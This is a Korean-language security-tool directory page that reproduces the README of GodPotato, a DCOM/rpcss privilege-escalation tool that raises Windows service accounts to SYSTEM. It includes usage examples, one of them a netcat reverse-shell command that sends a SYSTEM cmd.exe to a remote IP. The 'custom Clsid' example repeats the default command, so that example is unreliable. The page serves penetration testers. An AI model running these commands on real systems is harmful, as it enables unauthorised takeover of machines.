Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
GodPotato — DCOM 기반 권한 상승 도구로, Windows Server 2012-2022 및 Windows 8-11에서 ImpersonatePrivilege를 가진 사용자를 rpcss oxid 취약점을 통해 NT AUTHORITY\SYSTEM으로 상승시킵니다. | Kitploit
도구/GitHubGitHub/beichendream/godpotato
Privilege EscalationExploitationPost-ExploitationPenetration Testing
GitHubbeichendream/godpotato

GodPotato

DCOM 기반 권한 상승 도구로, Windows Server 2012-2022 및 Windows 8-11에서 ImpersonatePrivilege를 가진 사용자를 rpcss oxid 취약점을 통해 NT AUTHORITY\SYSTEM으로 상승시킵니다.

저장소 보기
2.3k273292년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

GodPotato

6년간의 RottenPotato에서 JuicyPotatoNG까지의 Potato 권한 상승 역사를 바탕으로 DCOM을 연구하여 Windows 2012 ~ Windows 2022에서 권한 상승이 가능한 새로운 기술을 발견했습니다. 이제 "ImpersonatePrivilege" 권한만 있으면 "NT AUTHORITY\SYSTEM"이 됩니다. 일반적으로 웹 서비스 및 데이터베이스 서비스는 "ImpersonatePrivilege" 권한을 가지고 있습니다.

Potato 권한 상승은 일반적으로 웹/데이터베이스 권한을 획득했을 때 사용됩니다. 낮은 권한의 서비스 사용자를 "NT AUTHORITY\SYSTEM" 권한으로 상승시킬 수 있습니다. 그러나 기존 Potato는 최신 Windows 시스템에서 실행할 방법이 없었습니다. DCOM을 연구하던 중 권한 상승을 수행할 수 있는 새로운 방법을 발견했습니다. rpcss가 oxid를 처리할 때 약간의 결함이 있으며, rpcss는 시스템이 반드시 열어야 하는 서비스이므로 거의 모든 Windows OS에서 실행할 수 있습니다. 이를 GodPotato라고 명명했습니다.

영향을 받는 버전

Windows Server 2012 ~ Windows Server 2022 Windows8 ~ Windows 11

예제

root@kitploit:~

    FFFFF                   FFF  FFFFFFF
   FFFFFFF                  FFF  FFFFFFFF
  FFF  FFFF                 FFF  FFF   FFF             FFF                  FFF
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF
 FFFF        FFFFFFF   FFFFFFFF  FFF   FFF  FFFFFFF  FFFFFFFFF   FFFFFF  FFFFFFFFF    FFFFFF
 FFFF       FFFF FFFF  FFF FFFF  FFF  FFFF FFFF FFFF   FFF      FFF  FFF    FFF      FFF FFFF
 FFFF FFFFF FFF   FFF FFF   FFF  FFFFFFFF  FFF   FFF   FFF      F    FFF    FFF     FFF   FFF
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF         FFFFF    FFF     FFF   FFFF
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF      FFFFFFFF    FFF     FFF   FFFF
  FFF   FFF FFF   FFF FFF   FFF  FFF       FFF   FFF   FFF     FFFF  FFF    FFF     FFF   FFFF
  FFFF FFFF FFFF  FFF FFFF  FFF  FFF       FFF  FFFF   FFF     FFFF  FFF    FFF     FFFF  FFF
   FFFFFFFF  FFFFFFF   FFFFFFFF  FFF        FFFFFFF     FFFFFF  FFFFFFFF    FFFFFFF  FFFFFFF
    FFFFFFF   FFFFF     FFFFFFF  FFF         FFFFF       FFFFF   FFFFFFFF     FFFF     FFFF


인자:

        -cmd 필수: True 명령줄 (기본값 cmd /c whoami)

예시:

GodPotato -cmd "cmd /c whoami"


프로그램 내장 Clsid를 사용하여 권한 상승 및 간단한 명령 실행

root@kitploit:~
GodPotato -cmd "cmd /c whoami"

Clsid를 사용자 지정하고 명령 실행

root@kitploit:~
GodPotato -cmd "cmd /c whoami"

리버스 셸 명령 실행

root@kitploit:~
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

감사합니다

zcgonvh

skay

라이선스

Apache License 2.0

도구 다운로드